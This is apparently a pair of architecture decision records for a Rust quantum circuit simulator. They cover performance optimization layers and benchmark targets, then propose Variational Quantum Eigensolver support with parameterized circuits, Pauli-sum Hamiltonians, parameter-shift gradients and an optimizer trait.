X -> X ==> Identity
S -> S_dag ==> Identity
CNOT -> CNOT (same control/target) ==> Identity
```
**Fusion effectiveness by algorithm**:
| Algorithm | Typical Fusion Ratio | Gate Reduction |
|-----------|----------------------|----------------|
| VQE (UCCSD ansatz) | 1.8-2.5x | 30-50% fewer state passes |
| Grover's | 1.2-1.5x | 15-25% |
| QAOA | 1.5-2.0x | 25-40% |
| QFT | 2.0-3.0x | 40-60% |
| Random circuit | 1.1-1.3x | 5-15% |
**Implementation**:
```rust
pub struct FusionPass;
impl CircuitOptimizer for FusionPass {
fn optimize(&self, circuit: &mut QuantumCircuit) {
let mut i = 0;
while i < circuit.gates.len() - 1 {
let current = &circuit.gates[i];
let next = &circuit.gates[i + 1];
if can_fuse(current, next) {
let fused = compute_fused_matrix(current, next);
circuit.gates[i] = fused;
circuit.gates.remove(i + 1);
// Don't advance i; check if we can fuse again
} else {
i += 1;
}
}
}
}
```
### Layer 4: Entanglement-Aware Splitting
Track which qubits have interacted via entangling gates. Simulate independent
qubit subsets as separate, smaller state vectors. Merge subsets when an
entangling gate connects them.
**Concept**:
```
Circuit: q0 --[H]--[CNOT(0,1)]--[Rz]--
q1 --[H]--[CNOT(0,1)]--[Ry]--
q2 --[H]--[X]---------[Rz]---[CNOT(2,0)]--
q3 --[H]--[Y]---------[Rx]--
Initially: {q0}, {q1}, {q2}, {q3} -- four 2^1 vectors (2 amps each)
After CNOT(0,1): {q0,q1}, {q2}, {q3} -- one 2^2 + two 2^1 vectors
After CNOT(2,0): {q0,q1,q2}, {q3} -- one 2^3 + one 2^1 vector
Memory: 8 + 2 = 10 amplitudes vs 2^4 = 16 amplitudes (full)
```
**Savings scale dramatically for circuits with late entanglement**:
```
Scenario: 20-qubit circuit, first 100 gates are local, then entangling
Without splitting: 2^20 = 1M amplitudes from gate 1
With splitting: 20 * 2^1 = 40 amplitudes until first entangling gate
Progressively merge as entanglement grows
```
**Data structure**:
```rust
pub struct SplitState {
/// Each subset: (qubit indices, state vector)
subsets: Vec<(Vec<usize>, QuantumState)>,
/// Union-Find structure for tracking connectivity
connectivity: UnionFind,
}
impl SplitState {
pub fn apply_gate(&mut self, gate: &Gate, targets: &[usize]) {
if gate.is_entangling() {
// Merge subsets containing target qubits
let merged = self.merge_subsets(targets);
// Apply gate to merged state
merged.apply_gate(gate, targets);
} else {
// Apply to the subset containing the target qubit
let subset = self.find_subset(targets[0]);
subset.apply_gate(gate, targets);
}
}
}
```
**When splitting helps vs. hurts**:
| Circuit Type | Splitting Benefit |
|-------------|-------------------|
| Shallow QAOA (p=1-3) | High (qubits entangle gradually) |
| VQE with local ansatz | High (many local rotations) |
| Grover's (full oracle) | Low (oracle entangles all qubits early) |
| QFT | Low (all-to-all entanglement) |
| Random circuits | Low (entangles quickly) |
The engine automatically disables splitting when all qubits are connected,
falling back to full state-vector simulation with zero overhead.
### Layer 5: Cache-Local Processing
For large state vectors (>20 qubits), cache utilization becomes critical.
The state vector exceeds L2 cache (typically 256 KB - 1 MB) and potentially
L3 cache (8-32 MB).
**Cache analysis**:
```
Qubits State Size L2 (512KB) L3 (16MB)
------ ---------- ---------- ---------
18 4 MB 8x oversize in cache
20 16 MB 32x in cache
22 64 MB 128x 4x oversize
24 256 MB 512x 16x oversize
25 512 MB 1024x 32x oversize
```
**Techniques**:
1. **Aligned allocation**: State vector aligned to cache line boundaries (64
bytes) for optimal prefetch behavior. Uses `ruvector-math` aligned allocator.
2. **Blocking/tiling**: For gates on high-index qubits, the stride between
amplitude pairs is large (2^target). Tiling the access pattern to process
cache-line-sized blocks sequentially improves spatial locality.
```
Without tiling (target qubit = 20):
Access pattern: amp[0], amp[1M], amp[1], amp[1M+1], ...
Cache misses: ~every access (stride = 16 MB)
With tiling (block size = L2/4):
Process block [0..64K], then [64K..128K], ...
Cache misses: ~1 per block (sequential within block)
```
3. **Prefetch hints**: Insert software prefetch instructions for the next block
of amplitudes while processing the current block.
```rust
// Prefetch next cache line while processing current
#[cfg(target_arch = "x86_64")]
unsafe {
core::arch::x86_64::_mm_prefetch(
state.as_ptr().add(i + CACHE_LINE_AMPS) as *const i8,
core::arch::x86_64::_MM_HINT_T0,
);
}
```
### Layer 6: Lazy Evaluation
Accumulate commuting rotations and defer their application until a
non-commuting gate appears. This reduces the number of full state-vector
passes for rotation-heavy circuits common in variational algorithms.
**Commutation rules**:
```
Rz(a) commutes with Rz(b) => Rz(a+b)
Rx(a) commutes with Rx(b) => Rx(a+b)
Rz commutes with CZ => Defer Rz
Diagonal gates commute => Combine phases
But:
Rz does NOT commute with H
Rx does NOT commute with CNOT (on target)
```
**Implementation sketch**:
```rust
pub struct LazyAccumulator {
/// Pending rotations per qubit: (axis, total_angle)
pending: HashMap<usize, Vec<(RotationAxis, f64)>>,
}
impl LazyAccumulator {
pub fn push_gate(&mut self, gate: &Gate, target: usize) -> Option<FlushedGate> {
if let Some(rotation) = gate.as_rotation() {
if let Some(existing) = self.pending.get_mut(&target) {
if existing.last().map_or(false, |(axis, _)| *axis == rotation.axis) {
// Same axis: accumulate angle
existing.last_mut().unwrap().1 += rotation.angle;
return None; // No gate emitted
}
}
self.pending.entry(target).or_default().push((rotation.axis, rotation.angle));
None
} else {
// Non-commuting gate: flush pending rotations for affected qubits
let flushed = self.flush(target);
Some(flushed)
}
}
}
```
**Effectiveness**: VQE circuits with alternating Rz-Rx-Rz layers see 20-40%
reduction in state-vector passes. QAOA circuits with repeated ZZ-rotation
layers see 15-30% reduction.
## Benchmark Targets
### Primary Benchmark Suite
| ID | Workload | Qubits | Gates | Target Time | Notes |
|----|----------|--------|-------|-------------|-------|
| B1 | Grover (8 qubits) | 8 | ~200 | < 1 ms | 3 Grover iterations |
| B2 | Grover (16 qubits) | 16 | ~3,000 | < 10 ms | ~64 iterations |
| B3 | VQE iteration (12 qubits) | 12 | ~120 | < 5 ms | Single parameter update |
| B4 | VQE iteration (20 qubits) | 20 | ~300 | < 50 ms | UCCSD ansatz |
| B5 | QAOA p=3 (10 nodes) | 10 | ~75 | < 1 ms | MaxCut on random graph |
| B6 | QAOA p=5 (20 nodes) | 20 | ~200 | < 200 ms | MaxCut on random graph |
| B7 | Surface code cycle (d=3) | 17 | ~20 | < 10 ms | Single syndrome round |
| B8 | 1000 surface code cycles | 17 | ~20,000 | < 2 s | Repeated error correction |
| B9 | QFT (20 qubits) | 20 | ~210 | < 30 ms | Full quantum Fourier transform |
| B10 | Random circuit (25 qubits) | 25 | 100 | < 10 s | Worst-case memory test |
### Micro-Benchmarks
Per-gate timing for individual operations:
| Gate | 10 qubits | 15 qubits | 20 qubits | 25 qubits |
|------|-----------|-----------|-----------|-----------|
| H | < 20 ns | < 0.5 us | < 50 us | < 1.5 ms |
| CNOT | < 30 ns | < 1 us | < 80 us | < 2.5 ms |
| Rz(theta) | < 15 ns | < 0.4 us | < 40 us | < 1.2 ms |
| Toffoli | < 50 ns | < 1.5 us | < 120 us | < 4 ms |
| Measure | < 10 ns | < 0.3 us | < 30 us | < 1 ms |
### WASM-Specific Benchmarks
| ID | Workload | Qubits | Target (WASM) | Target (Native) | Expected Ratio |
|----|----------|--------|---------------|-----------------|----------------|
| W1 | Grover (8) | 8 | < 3 ms | < 1 ms | ~3x |
| W2 | VQE iter (12) | 12 | < 12 ms | < 5 ms | ~2.5x |
| W3 | QAOA p=3 (10) | 10 | < 2.5 ms | < 1 ms | ~2.5x |
| W4 | Random (20) | 20 | < 500 ms | < 200 ms | ~2.5x |
| W5 | Random (25) | 25 | < 25 s | < 10 s | ~2.5x |
### Benchmark Infrastructure
Benchmarks use Criterion.rs for native and a custom timing harness for WASM:
```rust
// Native benchmarks (Criterion)
use criterion::{criterion_group, criterion_main, Criterion};
fn bench_grover_8(c: &mut Criterion) {
c.bench_function("grover_8_qubits", |b| {
b.iter(|| {
let mut state = QuantumState::new(8).unwrap();
let circuit = grover_circuit(8, &target_state);
state.execute(&circuit)
})
});
}
fn bench_single_gate_scaling(c: &mut Criterion) {
let mut group = c.benchmark_group("hadamard_scaling");
for n in [10, 12, 14, 16, 18, 20, 22, 24] {
group.bench_with_input(
BenchmarkId::from_parameter(n),
&n,
|b, &n| {
let mut state = QuantumState::new(n).unwrap();
let mut circuit = QuantumCircuit::new(n).unwrap();
circuit.gate(Gate::H, &[0]);
b.iter(|| state.execute(&circuit))
},
);
}
group.finish();
}
criterion_group!(benches, bench_grover_8, bench_single_gate_scaling);
criterion_main!(benches);
```
**WASM benchmark harness**:
```javascript
// Browser-based benchmark using performance.now()
async function benchmarkGrover8() {
const { QuantumCircuit, QuantumState } = await import('./ruqu_wasm.js');
const iterations = 100;
const start = performance.now();
for (let i = 0; i < iterations; i++) {
const circuit = QuantumCircuit.grover(8, 42);
const state = new QuantumState(8);
state.execute(circuit);
state.free();
circuit.free();
}
const elapsed = performance.now() - start;
console.log(`Grover 8-qubit: ${(elapsed / iterations).toFixed(3)} ms/iteration`);
}
```
### Performance Regression Detection
CI runs benchmark suite on every PR. Regressions exceeding 10% trigger a
warning; regressions exceeding 25% block the merge.
```yaml
# In CI pipeline
- name: Run benchmarks
run: |
cargo bench --package ruqu-core -- --save-baseline pr
cargo bench --package ruqu-core -- --baseline main --load-baseline pr
# critcmp compares and flags regressions
critcmp main pr --threshold 10
```
### Optimization Priority Matrix
Not all optimizations apply equally to all workloads. The priority matrix
guides implementation order:
| Optimization | Impact (small circuits) | Impact (large circuits) | Impl Effort | Priority |
|-------------|------------------------|------------------------|-------------|----------|
| SIMD | Medium (1.5-2x) | High (2-3.5x) | Medium | P0 |
| Multithreading | Low (overhead > benefit) | High (5-7x) | Medium | P1 |
| Gate fusion | High (30-50% fewer passes) | Medium (15-30%) | Low | P0 |
| Entanglement splitting | Variable (0-100x) | Low (quickly entangled) | High | P2 |
| Cache tiling | Low (fits in cache) | High (2-4x) | Medium | P1 |
| Lazy evaluation | Medium (20-40%) | Low (10-20%) | Low | P2 |
**Implementation order**: SIMD -> Gate Fusion -> Multithreading -> Cache Tiling
-> Lazy Evaluation -> Entanglement Splitting
## Consequences
### Positive
- **Competitive performance**: Multi-layered approach targets performance
parity with state-of-the-art Rust simulators (QuantRS2)
- **Interactive latency**: Most practical workloads (8-20 qubits) complete
in single-digit milliseconds, enabling real-time experimentation
- **Scalable**: Each optimization layer addresses a different bottleneck,
providing compounding benefits
- **Measurable**: Concrete benchmark targets enable objective progress tracking
and regression detection
### Negative
- **Optimization complexity**: Six optimization layers create significant
implementation and maintenance complexity
- **Ongoing tuning**: Performance characteristics vary across hardware;
benchmarks must cover representative platforms
- **Diminishing returns**: For >20 qubits, memory bandwidth dominates and
compute optimizations yield marginal gains
- **Testing burden**: Each optimization must be validated for numerical
correctness across all gate types
### Risks and Mitigations
| Risk | Likelihood | Impact | Mitigation |
|------|-----------|--------|------------|
| Memory bandwidth bottleneck at >20 qubits | High | Medium | Document expected scaling; recommend native for large circuits |
| Gate fusion introducing numerical error | Low | High | Comprehensive numerical tests comparing fused vs. unfused results |
| Entanglement tracking overhead exceeding savings | Medium | Low | Automatic disable when all qubits connected within first 10 gates |
| WASM SIMD not available in target runtime | Low | Medium | Graceful fallback to scalar; runtime feature detection |
| Benchmark targets too aggressive for edge hardware | Medium | Low | Separate targets for edge (Cognitum) vs. desktop; scale expectations |
## References
- [ADR-QE-001: Quantum Engine Core Architecture](./ADR-QE-001-quantum-engine-core-architecture.md)
- [ADR-QE-002: Crate Structure & Integration](./ADR-QE-002-crate-structure-integration.md)
- [ADR-QE-003: WASM Compilation Strategy](./ADR-QE-003-wasm-compilation-strategy.md)
- [ADR-003: SIMD Optimization Strategy](/docs/adr/ADR-003-simd-optimization-strategy.md)
- [ruvector-math crate](/crates/ruvector-math/)
- Guerreschi & Hogaboam, "Intel Quantum Simulator: A cloud-ready high-performance
simulator of quantum circuits" (2020)
- Jones et al., "QuEST and High Performance Simulation of Quantum Computers" (2019)
- QuantRS2 benchmark data (internal comparison)

View File

@@ -0,0 +1,650 @@
# ADR-QE-005: Variational Quantum Eigensolver (VQE) Support
**Status**: Proposed
**Date**: 2026-02-06
**Authors**: ruv.io, RuVector Team
**Deciders**: Architecture Review Board
## Version History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 0.1 | 2026-02-06 | ruv.io | Initial VQE architecture proposal |
---
## Context
### The Variational Quantum Eigensolver Problem
The Variational Quantum Eigensolver (VQE) is one of the most important near-term quantum
algorithms, with direct applications in computational chemistry, materials science, and
combinatorial optimization. VQE computes ground-state energies of molecular Hamiltonians
by variationally minimizing the expectation value of a Hamiltonian operator with respect
to a parameterized quantum state (ansatz).
### Why VQE Matters for ruQu
VQE sits at the intersection of quantum simulation and classical optimization, making it
a natural fit for ruQu's hybrid classical-quantum architecture:
1. **Chemistry applications**: Drug discovery, catalyst design, battery materials
2. **Optimization**: QUBO problems, portfolio optimization, logistics
3. **Benchmarking**: VQE circuits exercise the full gate set and serve as a representative
workload for evaluating simulator performance
4. **Agent integration**: ruVector agents can autonomously explore chemical configuration
spaces using VQE as the inner evaluation kernel
### Core Requirements
| Requirement | Description | Priority |
|-------------|-------------|----------|
| Parameterized circuits | Symbolic gate angles resolved at evaluation time | P0 |
| Hamiltonian decomposition | Represent H as sum of weighted Pauli strings | P0 |
| Exact expectation values | Direct state vector computation (no shot noise) | P0 |
| Gradient evaluation | Parameter-shift rule for classical optimizer | P0 |
| Shot-based sampling | Optional mode for hardware noise emulation | P1 |
| Classical optimizer interface | Trait-based abstraction for multiple optimizers | P1 |
| Hardware-efficient ansatz | Pre-built ansatz library for common topologies | P2 |
### Current Limitations
Without dedicated VQE support, users must manually:
- Construct parameterized circuits with explicit angle substitution per iteration
- Decompose Hamiltonians into individual Pauli measurements
- Implement gradient computation by duplicating circuit evaluations
- Wire up classical optimizers with no standard interface
This is error-prone and leaves significant performance on the table, since a state vector
simulator can compute exact expectation values in a single pass without sampling overhead.
---
## Decision
### 1. Parameterized Gate Architecture
Circuits accept symbolic parameters that are resolved to numeric values per evaluation.
This avoids circuit reconstruction on each VQE iteration.
```
┌──────────────────────────────────────────────────┐
│ Parameterized Circuit │
│ │
│ ┌─────┐ ┌──────────┐ ┌─────┐ ┌──────────┐ │
|0> ─────────┤ │ H ├──┤ Ry(θ[0]) ├──┤ CX ├──┤ Rz(θ[2]) ├──┤───
│ └─────┘ └──────────┘ └──┬──┘ └──────────┘ │
│ │ │
|0> ─────────┤──────────────────────────────●───── Ry(θ[1]) ────┤───
│ │
└──────────────────────────────────────────────────┘
parameters: [θ[0], θ[1], θ[2]]
values: [0.54, 1.23, -0.87]
```
**Data model**:
```rust
/// A symbolic parameter in a quantum circuit.
#[derive(Debug, Clone, PartialEq, Eq, Hash)]
pub struct Parameter {
pub name: String,
pub index: usize,
}
/// A gate that may reference symbolic parameters.
pub enum ParameterizedGate {
/// Fixed gate (no parameters)
Fixed(Gate),
/// Rotation gate with a symbolic angle
Rx(ParameterExpr),
Ry(ParameterExpr),
Rz(ParameterExpr),
/// Parameterized two-qubit gate
Rzz(ParameterExpr, Qubit, Qubit),
}
/// Expression for a gate parameter (supports linear combinations).
pub enum ParameterExpr {
/// Direct parameter reference: θ[i]
Param(usize),
/// Scaled parameter: c * θ[i]
Scaled(f64, usize),
/// Sum of expressions
Sum(Box<ParameterExpr>, Box<ParameterExpr>),
/// Constant value
Constant(f64),
}
```
**Resolution**: When `evaluate(params: &[f64])` is called, each `ParameterExpr` is resolved
to a concrete `f64`, and the corresponding unitary matrix is computed. This happens once per
VQE iteration and is negligible compared to state vector manipulation.
### 2. Hamiltonian Representation
The Hamiltonian is represented as a sum of weighted Pauli strings:
```
H = c_0 * I + c_1 * Z_0 + c_2 * Z_1 + c_3 * Z_0 Z_1 + c_4 * X_0 X_1 + ...
```
where each term is a tensor product of single-qubit Pauli operators {I, X, Y, Z}.
```rust
/// A single Pauli operator on one qubit.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum Pauli {
I,
X,
Y,
Z,
}
/// A Pauli string: tensor product of single-qubit Paulis.
/// Stored as a compact bitfield for n-qubit systems.
///
/// Encoding: 2 bits per qubit (00=I, 01=X, 10=Y, 11=Z)
/// For n <= 32 qubits, fits in a single u64.
#[derive(Debug, Clone, PartialEq, Eq, Hash)]
pub struct PauliString {
/// Packed Pauli operators (2 bits each)
pub ops: Vec<u64>,
/// Number of qubits
pub n_qubits: usize,
}
/// A Hamiltonian as a sum of weighted Pauli strings.
///
/// H = sum_j c_j P_j
pub struct PauliSum {
/// Terms: (coefficient, Pauli string)
pub terms: Vec<(Complex64, PauliString)>,
/// Number of qubits
pub n_qubits: usize,
}
```
**Optimization**: Identity terms (all-I Pauli strings) contribute a constant energy offset
and require no state vector computation. The implementation detects and separates these
before the expectation loop.
### 3. Direct Expectation Value Computation
This is the critical performance advantage of state vector simulation over real hardware.
On physical quantum computers, expectation values must be estimated via repeated
measurement (shot-based sampling), requiring O(1/epsilon^2) shots for epsilon precision.
In a state vector simulator, we compute the **exact** expectation value:
```
<psi| H |psi> = sum_j c_j * <psi| P_j |psi>
```
For each Pauli string P_j, the expectation value is:
```
<psi| P_j |psi> = sum_k psi_k* (P_j |psi>)_k
```
Since P_j is a tensor product of single-qubit Paulis, its action on a basis state |k> is:
- I: |k> -> |k>
- X: flips qubit, no phase
- Y: flips qubit, phase factor +/- i
- Z: no flip, phase factor +/- 1
This means each Pauli string maps each basis state to exactly one other basis state with
a phase factor. The expectation value reduces to a sum over 2^n amplitudes.
```rust
impl QuantumState {
/// Compute the exact expectation value of a PauliSum.
///
/// Complexity: O(T * 2^n) where T = number of Pauli terms, n = qubits.
/// For a 12-qubit system with 100 Pauli terms:
/// 100 * 4096 = 409,600 operations ~ 0.5ms
pub fn expectation(&self, hamiltonian: &PauliSum) -> f64 {
let mut total = 0.0_f64;
for (coeff, pauli) in &hamiltonian.terms {
let mut term_val = Complex64::zero();
for k in 0..self.amplitudes.len() {
// Compute P_j |k>: determine target index and phase
let (target_idx, phase) = pauli.apply_to_basis(k);
// <k| P_j |psi> = phase * psi[target_idx]
// Accumulate psi[k]* * phase * psi[target_idx]
term_val += self.amplitudes[k].conj()
* phase
* self.amplitudes[target_idx];
}
total += (coeff * term_val).re;
}
total
}
}
```
**Function signature**: `QuantumState::expectation(PauliSum) -> f64`
#### Accuracy Advantage Over Sampling
| Method | Precision | Evaluations | 12-qubit Cost |
|--------|-----------|-------------|---------------|
| Shot-based (1000 shots) | ~3% | 1000 circuit runs per term | ~500ms |
| Shot-based (10000 shots) | ~1% | 10000 circuit runs per term | ~5s |
| Shot-based (1M shots) | ~0.1% | 1M circuit runs per term | ~500s |
| **Exact (state vector)** | **Machine epsilon** | **1 pass over state** | **~0.5ms** |
For VQE convergence, exact expectation values eliminate the statistical noise floor that
plagues hardware-based VQE. Classical optimizers receive clean gradients, leading to:
- Faster convergence (fewer iterations)
- No barren plateau artifacts from shot noise
- Deterministic reproducibility
### 4. Gradient Support via Parameter-Shift Rule
The parameter-shift rule provides exact analytic gradients for parameterized quantum gates.
For a gate with parameter theta:
```
d/d(theta) <H> = [<H>(theta + pi/2) - <H>(theta - pi/2)] / 2
```
This requires two circuit evaluations per parameter per gradient component.
```rust
/// Compute the gradient of the expectation value with respect to all parameters.
///
/// Uses the parameter-shift rule:
/// grad_i = [E(theta_i + pi/2) - E(theta_i - pi/2)] / 2
///
/// Complexity: O(2 * n_params * circuit_eval_cost)
/// For 12 qubits, 20 parameters, 100 Pauli terms:
/// 2 * 20 * (circuit_sim + expectation) ~ 40 * 1ms = 40ms
pub fn gradient(
circuit: &ParameterizedCircuit,
hamiltonian: &PauliSum,
params: &[f64],
) -> Vec<f64> {
let n_params = params.len();
let mut grad = vec![0.0; n_params];
let shift = std::f64::consts::FRAC_PI_2; // pi/2
for i in 0..n_params {
// Forward shift
let mut params_plus = params.to_vec();
params_plus[i] += shift;
let e_plus = evaluate_energy(circuit, hamiltonian, &params_plus);
// Backward shift
let mut params_minus = params.to_vec();
params_minus[i] -= shift;
let e_minus = evaluate_energy(circuit, hamiltonian, &params_minus);
grad[i] = (e_plus - e_minus) / 2.0;
}
grad
}
```
### 5. Classical Optimizer Interface
A trait-based abstraction supports plugging in different classical optimizers without
changing the VQE loop:
```rust
/// Trait for classical optimizers used in the VQE outer loop.
pub trait ClassicalOptimizer: Send {
/// Initialize the optimizer with the parameter count.
fn initialize(&mut self, n_params: usize);
/// Propose next parameter values given current energy and optional gradient.
fn step(
&mut self,
params: &[f64],
energy: f64,
gradient: Option<&[f64]>,
) -> OptimizerResult;
/// Check if the optimizer has converged.
fn has_converged(&self) -> bool;
/// Get optimizer name for logging.
fn name(&self) -> &str;
}
/// Result of an optimizer step.
pub struct OptimizerResult {
pub new_params: Vec<f64>,
pub converged: bool,
pub iteration: usize,
}
```
**Provided implementations**:
| Optimizer | Type | Gradient Required | Best For |
|-----------|------|-------------------|----------|
| `GradientDescent` | Gradient-based | Yes | Simple landscapes |
| `Adam` | Adaptive gradient | Yes | Noisy gradients, deep circuits |
| `LBFGS` | Quasi-Newton | Yes | Smooth landscapes, fast convergence |
| `COBYLA` | Derivative-free | No | Non-differentiable cost functions |
| `NelderMead` | Simplex | No | Low-dimensional problems |
| `SPSA` | Stochastic | No | Shot-based mode, noisy evaluations |
### 6. VQE Iteration Loop
The complete VQE algorithm proceeds as follows:
```
VQE Iteration Loop
==================
Input: Hamiltonian H (PauliSum), Ansatz A (ParameterizedCircuit),
Optimizer O (ClassicalOptimizer), initial params theta_0
Output: Minimum energy E_min, optimal params theta_opt
theta = theta_0
O.initialize(len(theta))
repeat:
┌─────────────────────────────────────────────┐
│ 1. PREPARE STATE │
│ |psi(theta)> = A(theta) |0...0> │
│ [Simulate parameterized circuit] │
│ Cost: O(G * 2^n) where G = gate count │
└─────────────────────────────────────────────┘
┌─────────────────────────────────────────────┐
│ 2. EVALUATE ENERGY │
│ E = <psi(theta)| H |psi(theta)> │
│ [Direct state vector expectation] │
│ Cost: O(T * 2^n) where T = Pauli terms │
└─────────────────────────────────────────────┘
┌─────────────────────────────────────────────┐
│ 3. COMPUTE GRADIENT (if optimizer needs it) │
│ grad = parameter_shift(A, H, theta) │
│ [2 * n_params circuit evaluations] │
│ Cost: O(2P * (G + T) * 2^n) │
└─────────────────────────────────────────────┘
┌─────────────────────────────────────────────┐
│ 4. CLASSICAL UPDATE │
│ theta_new = O.step(theta, E, grad) │
│ [Pure classical computation] │
│ Cost: O(P^2) for quasi-Newton │
└─────────────────────────────────────────────┘
┌─────────────────────────────────────────────┐
│ 5. CONVERGENCE CHECK │
│ if |E_new - E_old| < tol: STOP │
│ else: theta = theta_new, continue │
└─────────────────────────────────────────────┘
return (E_min, theta_opt)
```
**Pseudocode**:
```rust
pub fn vqe(
ansatz: &ParameterizedCircuit,
hamiltonian: &PauliSum,
optimizer: &mut dyn ClassicalOptimizer,
config: &VqeConfig,
) -> VqeResult {
let n_params = ansatz.parameter_count();
let mut params = config.initial_params.clone()
.unwrap_or_else(|| vec![0.0; n_params]);
optimizer.initialize(n_params);
let mut best_energy = f64::INFINITY;
let mut best_params = params.clone();
let mut history = Vec::new();
for iteration in 0..config.max_iterations {
// Step 1+2: Simulate circuit and compute energy
let state = ansatz.simulate(&params);
let energy = state.expectation(hamiltonian);
// Track best
if energy < best_energy {
best_energy = energy;
best_params = params.clone();
}
// Step 3: Compute gradient if needed
let grad = if optimizer.needs_gradient() {
Some(gradient(ansatz, hamiltonian, &params))
} else {
None
};
history.push(VqeIteration { iteration, energy, params: params.clone() });
// Step 4: Classical update
let result = optimizer.step(&params, energy, grad.as_deref());
params = result.new_params;
// Step 5: Convergence check
if result.converged || (iteration > 0 &&
(history[iteration].energy - history[iteration - 1].energy).abs()
< config.convergence_threshold) {
break;
}
}
VqeResult {
energy: best_energy,
optimal_params: best_params,
iterations: history.len(),
history,
converged: optimizer.has_converged(),
}
}
```
### 7. Optional Shot-Based Sampling Mode
For mimicking real hardware behavior and testing noise resilience:
```rust
/// Configuration for shot-based VQE mode.
pub struct ShotConfig {
/// Number of measurement shots per expectation estimation
pub shots: usize,
/// Random seed for reproducibility
pub seed: Option<u64>,
/// Readout error rate (probability of bit flip on measurement)
pub readout_error: f64,
}
impl QuantumState {
/// Estimate expectation value via shot-based sampling.
///
/// Samples the state `shots` times in the computational basis,
/// then computes the empirical expectation of each Pauli term.
pub fn expectation_sampled(
&self,
hamiltonian: &PauliSum,
config: &ShotConfig,
) -> (f64, f64) {
// Returns (mean, standard_error)
// Standard error = std_dev / sqrt(shots)
todo!()
}
}
```
### 8. Hardware-Efficient Ansatz Patterns
Pre-built ansatz constructors for common use cases:
```
Hardware-Efficient Ansatz (depth d, n qubits):
Layer 1..d:
┌─────┐ ┌──────────┐ ┌──────────┐ ┌──────────┐
┤ Ry ├──┤ Rz ├──┤ CNOT ├──┤ Ry ├──
└─────┘ └──────────┘ │ ladder │ └──────────┘
┌─────┐ ┌──────────┐ │ │ ┌──────────┐
┤ Ry ├──┤ Rz ├──┤ ├──┤ Ry ├──
└─────┘ └──────────┘ └──────────┘ └──────────┘
Parameters per layer: 3n (Ry + Rz + Ry per qubit)
Total parameters: 3nd
```
```rust
/// Pre-built ansatz constructors.
pub mod ansatz {
/// Hardware-efficient ansatz with Ry-Rz layers and linear CNOT entanglement.
pub fn hardware_efficient(n_qubits: usize, depth: usize) -> ParameterizedCircuit;
/// UCCSD (Unitary Coupled Cluster Singles and Doubles) for chemistry.
/// Generates excitation operators based on active space.
pub fn uccsd(n_electrons: usize, n_orbitals: usize) -> ParameterizedCircuit;
/// Hamiltonian variational ansatz: layers of exp(-i * theta_j * P_j)
/// for each term P_j in the Hamiltonian.
pub fn hamiltonian_variational(
hamiltonian: &PauliSum,
depth: usize,
) -> ParameterizedCircuit;
/// Symmetry-preserving ansatz that respects particle number conservation.
pub fn symmetry_preserving(
n_qubits: usize,
n_particles: usize,
depth: usize,
) -> ParameterizedCircuit;
}
```
### 9. Performance Analysis
#### 12-Qubit VQE Performance Estimate
| Component | Operations | Time |
|-----------|-----------|------|
| State vector size | 2^12 = 4,096 complex amplitudes | 64 KB |
| Circuit simulation (50 gates) | 50 * 4096 = 204,800 ops | ~0.3ms |
| Expectation (100 Pauli terms) | 100 * 4096 = 409,600 ops | ~0.5ms |
| Gradient (20 params) | 40 * (0.3 + 0.5) ms | ~32ms |
| Classical optimizer step | O(20^2) | ~0.001ms |
| **Total per iteration (with gradient)** | | **~33ms** |
| **Total per iteration (no gradient)** | | **~0.8ms** |
For gradient-free optimizers (COBYLA, Nelder-Mead), a 12-qubit VQE iteration completes
in under 1ms. With parameter-shift gradients, the cost scales linearly with parameter
count but remains under 50ms for typical chemistry ansatze.
**Scaling with qubit count**:
| Qubits | State Size | Memory | Energy Eval (100 terms) | Gradient (20 params) |
|--------|-----------|--------|------------------------|---------------------|
| 8 | 256 | 4 KB | ~0.03ms | ~2ms |
| 12 | 4,096 | 64 KB | ~0.5ms | ~33ms |
| 16 | 65,536 | 1 MB | ~8ms | ~500ms |
| 20 | 1,048,576 | 16 MB | ~130ms | ~8s |
| 24 | 16,777,216 | 256 MB | ~2s | ~130s |
| 28 | 268,435,456 | 4 GB | ~33s | ~35min |
### 10. Integration with ruVector Agent System
ruVector agents can drive autonomous chemistry optimization using VQE as the evaluation
kernel:
```
┌─────────────────────────────────────────────────────────────────┐
│ ruVector Agent Orchestration │
│ │
│ ┌──────────┐ ┌──────────────┐ ┌────────────────────┐ │
│ │ Research │───>│ Architecture │───>│ Chemistry Agent │ │
│ │ Agent │ │ Agent │ │ │ │
│ │ │ │ │ │ - Molecule spec │ │
│ │ Literature│ │ Hamiltonian │ │ - Basis set sel. │ │
│ │ search │ │ generation │ │ - Active space │ │
│ └──────────┘ └──────────────┘ │ - VQE execution │ │
│ │ - Result analysis │ │
│ └────────┬───────────┘ │
│ │ │
│ ┌────────▼───────────┐ │
│ │ ruQu VQE Engine │ │
│ │ │ │
│ │ Parameterized │ │
│ │ Circuit + PauliSum│ │
│ │ + Optimizer │ │
│ └────────────────────┘ │
└─────────────────────────────────────────────────────────────────┘
```
The agent workflow:
1. **Research agent** retrieves molecular structure and prior computational results
2. **Architecture agent** generates the qubit Hamiltonian (Jordan-Wigner or Bravyi-Kitaev
transformation from fermionic operators)
3. **Chemistry agent** selects ansatz, optimizer, and runs VQE iterations
4. **Results** are stored in ruVector memory for pattern learning across molecules
---
## Consequences
### Benefits
1. **Exact expectation values** eliminate sampling noise, enabling faster convergence and
deterministic reproducibility -- a major advantage over hardware VQE
2. **Symbolic parameterization** avoids circuit reconstruction overhead, reducing per-iteration
cost to pure state manipulation
3. **Trait-based optimizer interface** allows users to swap optimizers without touching VQE
logic, and supports custom optimizer implementations
4. **Hardware-efficient ansatz library** provides tested, production-quality circuit templates
for common use cases
5. **Gradient support** via parameter-shift rule enables modern gradient-based optimization
(Adam, L-BFGS) that converges significantly faster than derivative-free methods
6. **Agent integration** enables autonomous, memory-enhanced chemistry exploration that
learns from prior VQE runs across molecular configurations
### Risks
| Risk | Probability | Impact | Mitigation |
|------|------------|--------|------------|
| Exponential memory scaling limits qubit count | High | Medium | Tensor network backend for >30 qubits (future ADR) |
| Parameter-shift gradient cost scales with parameter count | Medium | Medium | Batched gradient evaluation, simultaneous perturbation (SPSA) fallback |
| Hamiltonian term count explosion for large molecules | Medium | High | Pauli grouping (qubit-wise commuting), measurement reduction techniques |
| Optimizer convergence to local minima | Medium | Medium | Multi-start strategies, QAOA-inspired initialization |
### Trade-offs
| Decision | Advantage | Disadvantage |
|----------|-----------|--------------|
| Exact expectation over sampling | Machine-precision accuracy | Not representative of real hardware noise |
| Parameter-shift over finite-difference | Exact gradients | 2x evaluations per parameter |
